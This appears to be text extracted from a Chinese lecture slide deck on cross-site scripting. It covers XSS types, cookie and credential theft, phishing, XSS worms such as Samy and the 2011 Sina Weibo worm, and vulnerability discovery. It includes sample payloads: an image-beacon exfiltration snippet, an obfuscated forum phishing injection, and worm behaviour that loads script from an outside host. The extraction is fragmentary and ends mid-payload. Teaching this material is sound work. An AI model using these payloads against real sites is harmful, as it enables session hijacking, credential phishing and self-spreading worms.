您好,欢迎访问三七文档
XSS跨站脚本攻击Page2主要内容XSS跨站脚本攻击定义XSS跨站脚本攻击类型XSS跨站脚本攻击漏洞挖掘如何防范XSS跨站脚本攻击漏洞XSS跨站脚本攻击方式与实例Page3XSS定义跨站脚本攻击(CrossSiteScripting)是指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。为了与层叠样式表(CascadingStyleSheets)的缩写CSS区分开,跨站脚本攻击通常简写为XSS。Page4XSS?php$username=$_GET[name];echop欢迎您,.$username.!/p;?代码的主要作用是获取用户输入的参数作为用户名,并在页面中显示“欢迎您,XXX”的形式Page5XSS=张三Page6XSS=scriptalert(/我的名字是张三/)/scriptPage7XSS类型反射型XSS存储型XSSDOMBasedXSSPage8反射型XSS反射型XSS只是简单地将用户输入的数据直接或未经过完善的安全过滤就在浏览器中进行输出,导致输出的数据中存在可被浏览器执行的代码数据。由于此种类型的跨站代码存在于URL中,所以黑客通常需要通过诱骗或加密变形等方式将存在恶意代码的链接发给用户,只有用户点击以后才能使得攻击成功实施。Page9反射型XSS反射型XSS是最为常见的一种XSS类型Page10反射型XSSPage11反射型XSSPage12反射型XSSPage13反射型XSSPage14反射型XSSPage15反射型XSSPage16存储型XSS存储型XSS脚本攻击是指由于Web应用程序对用户输入数据的不严格,导致Web应用程序将黑客输入的恶意跨站攻击数据信息保存在服务端的数据库或其他文件形式中,当网页进行数据查询展示时,会从数据库中获取数据内容,并将数据内容在网页中进行输出展示,进而导致跨站脚本代码的执行。Page17存储型XSS存储型XSS脚本攻击最为常见的场景就是在留言板、博客或新闻发布系统中,恶意代码的数据信息直接写入文章、评论、留言中,浏览时即会执行相应的脚本代码。Page18存储型XSSPage19存储型XSSBo-Blog早期版本评论部分的存储型XSSPage20DOMBasedXSS基于DOM的XSS跨站脚本攻击是通过修改页面DOM节点数据信息而形成的XSS跨站脚本攻击。不同于反射型XSS和存储型XSS,基于DOM的XSS跨站脚本攻击往往需要针对具体的JavascriptDOM代码进行分析,并根据实际情况进行XSS跨站脚本攻击的利用。Page21DOMBasedXSSPage22DOMBasedXSSimgsrc=‘’/imgPage23DOMBasedXSS#’onerror=’javascript:alert(/DOMBasedXSSTest/)imgsrc=‘#’onerror=’javascript:alert(/DOMBasedXSSTest/)’/imgPage24DOMBasedXSSPage25DOMBasedXSSPage26DOMBasedXSSPage27XSS攻击方式与实例XSS攻击方式绝不是弹窗这么简单……Page28XSS攻击方式与实例XSS偷取用户信息XSS盗取CookieXSS钓鱼攻击XSS蠕虫攻击Page29XSS偷取用户信息='iframesrc=偷取用户信息(未完待续)Page32XSS偷取用户信息(完)Page33XSS偷取用户信息='scriptsrc=偷取用户信息收取XSS偷取到的用户信息浏览器的同源策略相同协议相同域名相同端口跨域提交img=newImage();img.src==+msg;Page35XSS偷取用户信息如何诱骗对方?URL编码变形?短链接变形?隐藏在其他页面中?......Page36XSS盗取Cookie对某个钓鱼网站的XSS攻击测试Page37XSS盗取CookiePage38XSS盗取CookiePage39XSS盗取CookiePage40XSS盗取CookiePage41XSS盗取CookiePage42XSS钓鱼攻击以盛大论坛的跨站钓鱼攻击演示。首先需要了解的就是,盛大的游戏登陆都是使用盛大通行证进行登录的,而盛大的论坛也是使用盛大通行证进行登录,所以如果黑客通过盗取用户登录论坛时的信息,就相当于盗取了用户的账号和密码,盛大的论坛就存在XSS漏洞,使得黑客可以通过XSS钓鱼攻击方式获取用户的账号和密码Page43XSS钓鱼攻击存在过滤不严的位置为用户资料中的个人主页部分。[url]http://''STYLE='a:expression(document.write(s\143riptlanguage=javas\143riptsrc==GB2312/s\143ript))'target=_blank[/url]然后利用插入代码的账号在论坛中发帖子或回复,当别的用户访问该账号发布或回复的帖子时,就会执行插入的恶意代码。就是构造的恶意代码,这个代码是用来钓鱼的页面。Page44XSS钓鱼攻击Page45XSS钓鱼攻击Page46XSS蠕虫攻击XSS蠕虫的破坏力和影响力都是巨大的。XSS蠕虫主要发生在用户之间存在交互行为的页面中,当Web应用程序对用户输入的数据信息没有做严格的过滤时,通过结合Ajax的异步提交,就可以实现在植入恶意代码的同时,将恶意代码进行对外发送,即实现了代码的感染和传播,也就形成了XSS蠕虫。Page47XSS蠕虫攻击出现最早、最出名的XSS蠕虫攻击事件MySpace的SamyXSS蠕虫攻击事件MySpace是全球互联网上最大的个人空间,是以SNS为基础的娱乐平台,也是全球最大的在线交友平台,通过MySpace用户可以很容易地建立属于自己的个性空间,上传照片,发表日志,还可以分享其他人发布的相关信息等。MySpace也支持交友功能,好友信息会显示在个人空间的好友列表中,但是,如果想通过MySpace添加其他人为自己的好友,需要得到对方的验证通过才可以。2005年10月,一个名叫Samy的人在网上发布了一片文章,在文章中他说找到了一种方法可以借助MySpace网站自身存在的漏洞实现自动化添加自己到别人的空间中,并且经过他测试这种方法,在3个小时内,添加了2429个好友,同时收到了6373个来自MySpace上其他人添加自己为好友的请求,由此而导致了大量的恶意数据和垃圾信息在MySpace上传播,对网站和用户都造成了巨大的损失。Page48XSS蠕虫攻击我国曾经爆发过的典型XSS蠕虫攻击事件百度XSS蠕虫攻击人人XSS蠕虫攻击搜狐XSS蠕虫攻击新浪微博XSS蠕虫攻击......Page49XSS蠕虫攻击百度XSS蠕虫事件在短短几个小时蠕虫的访问量就有几千IPPage50XSS蠕虫攻击人人网蠕虫攻击事件中流量在几天时间里大增,这些天应该是蠕虫感染的时间。日访问人数从0猛增到500百万人/天Page51XSS蠕虫攻击搜狐XSS蠕虫攻击事件中也有大量的用户收到攻击和感染Page52XSS蠕虫攻击一次典型的XSS蠕虫攻击事件2011年6月28日晚,新浪微博遭遇到XSS蠕虫攻击侵袭,微博用户中招后,会自动通过发微博和发送私信的方式将XSS蠕虫信息对外传播,发布带有恶意脚本的链接地址,当用户的粉丝点击带有恶意脚本的链接后就会再次中毒,进而形成恶性循环。其中众多加V认证的用户受到感染,当此类用户发布相关微博和私信内容后,蠕虫的传播将变得更为广泛,影响也更为严重。在不到一个小时的时间,已经有超过3万微博用户受到该XSS蠕虫的攻击。Page53XSS蠕虫攻击黑客通过对新浪微博的分析测试发现新浪名人堂部分由于代码过滤不严,导致XSS漏洞的存在,并可以通过构造脚本的方式植入恶意代码。通过分析我们发现,在新浪名人堂部分中,当提交=//=update时,新浪会对该字符串进行处理,变成类似=xyyydscriptsrc=//=update,而由于应用程序没有对参数g做充足的过滤且将参数值直接显示在页面中,相当于weibo.com在页面中嵌入了一个来自于2kt.cn的js脚本,该JS脚本是黑客可以控制的文件,进而使得黑客可以构造任意js脚本嵌入到weibo.com的页面中,且通过Ajax技术完全可以实现异步提交数据的功能,进而黑客通过构造特定的js代码实现了受此XSS蠕虫攻击的客户自动发微薄、添加关注和发私信等操作。Page54XSS蠕虫攻击Page55XSS蠕虫攻击蠕虫代码:蠕虫攻击蠕虫代码:蠕虫攻击详细分析操作1:发布一条微博,微博的题目为随机题目,且这些题目均为当时网络环境中比较热门或有争议的题目,诱骗用户点击。Page58XSS蠕虫攻击详细分析操作2:关注加uid为2201270010的账户,且该账户就为此次攻击事件的操纵者,即用户名称为hellosamy用户Page59XSS蠕虫攻击详细分析操作3:构造并私信的方式将恶意链接信息发送到好友账号中,且题目仍然为上面提到的热门话题,进而实现恶意链接的快速传播和感染Page60挖掘XSS漏洞挖掘XSS漏洞方法扫描工具自动化检测手工测试源码分析Page61挖掘XSS漏洞扫描工具自动检测WVSAppScanJSkyPage62挖掘XSS漏洞手工测试澳客彩票网反射型XSS测试过程Page63挖掘XSS漏洞手工测试澳客彩票网反射型XSS测试过程Page64挖掘XSS漏洞手工测试澳客彩票网反射型XSS测试过程Page65挖掘XSS漏洞手工测试澳客彩票网反射型XSS测试过程Page66挖掘XSS漏洞手工测试澳客彩票网反射型XSS测试过程=%bf);eval(String.from
本文标题:XSS跨站脚本攻击
链接地址:https://www.777doc.com/doc-6124329 .html